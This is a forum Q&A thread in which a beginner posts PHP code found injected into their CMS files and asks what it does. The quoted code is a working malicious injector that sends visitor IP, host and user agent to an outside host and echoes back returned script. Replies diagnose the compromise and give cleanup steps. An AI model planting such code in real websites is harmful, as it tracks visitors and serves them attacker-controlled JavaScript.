# What does this PHP Code on my Website do?

Tags: php

I have installed a little Project Website and now found this code in many of my PHP Files.
I have no Idea what it does, it`s not in the source code i once installed.
I have no idea from where it came:

```
<?php
#68fa27#
error_reporting(0); 
ini_set('display_errors',0); 
$wp_mrgv474 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mrgv474) && !preg_match ('/bot/i', $wp_mrgv474))){
     $wp_mrgv09474="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mrgv474);
     $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_mrgv09474);
     curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, 
     CURLOPT_RETURNTRANSFER, 1); 
     $wp_474mrgv = curl_exec ($ch); 
     curl_close($ch);
}
if ( substr($wp_474mrgv,1,3) === 'scr' ){ 
    echo $wp_474mrgv; 
}
#/68fa27#
?>
```

Would be great if someone could help me out here.

Thanks in advance.

Comment: If this isn't code you created, your site has probably been compromised. This code is downloading and displaying something from the control site.

Comment: Which part of the code don't you understand? There's nothing very complex in it.

Comment: What do you mean with "control site"?

Comment: The server that the person who runs the botnet uses to control the bots.

Comment: I am a Beginner. I just installed a ready to go CMS for my Website some Time ago. And now i found this code all over my PHP Files. It wasn`t in the original code.

Comment: Your site has been infected with malware. If someone goes to your site using IE or Edge, it downloads JavaScript and inserts it into the page.

Comment: Okay, so i remove all of this code and should be fine?

Comment: You need to harden your system or it will become infected again.

Comment: Okay, i will check my system and delete the code. Thank you very much for your help :)

Comment: BTW, the code doesn't actually work. The `htmlvalue.com` domain registration has expired.

Comment: Yeah, that was the first thing i checked. Now i need to identify since when this code was there and how it got there... I am not the only one with server acces, so this is going to be interesting. I hope with changing all passwords and removing the code i will be fine.

Comment: This question title is super not good/searchable.

Comment: Okay, any suggestion for a good title? I had no idea what this code was, so that was the only question that came in mind, sorry.

Answer (score 0, accepted):

- It first disables the errors.
- Checks the user_agent and if it doesn't contain that is a bot it sends the ip address, the referer and the user agent as parameters to http://htmlvalue.com/value
- If the answer to this last call has 'scr' at the beginning it will show the answer (it mostly seems it might return `<script>`... so it executes the javascript code returned from that site).

More info can be found here: https://www.linuxquestions.org/questions/linux-security-4/server-attacked-code-4175494334/

https://wordpress.org/support/topic/headerphp-was-hacked/#post-5058987

And here:
https://www.themenmix.de/wordpress-virus-die-code-analyse/

I would follow these instructions:

- Save the original wp-config.php and custom-functions.php  after the removal of the script in the top line of the PHP.
- Download and install a fresh copy of the latest version of WordPress.
- Delete all plug-ins and re-install them from inside the WordPress admin panel (Only the ones which seem safe).
- Change WordPress and FTP login passwords to (hopefully) protect the site from further attacks.

From https://techjaws.com/php-script-injection-exploit-in-wordpress-271/ with minor changes.

Comment: Thank you very much for the Information and your help. I will check my system and remove this code in my PHP files. I hope i will be fine then.

Comment: After reading many of the links I would also follow the steps they say here: https://techjaws.com/php-script-injection-exploit-in-wordpress-271/ but downloading the latest wordpress version and not the one they say. And only installing plugins that seem safe

Comment: Okay, i will do as you suggested. Thanks :)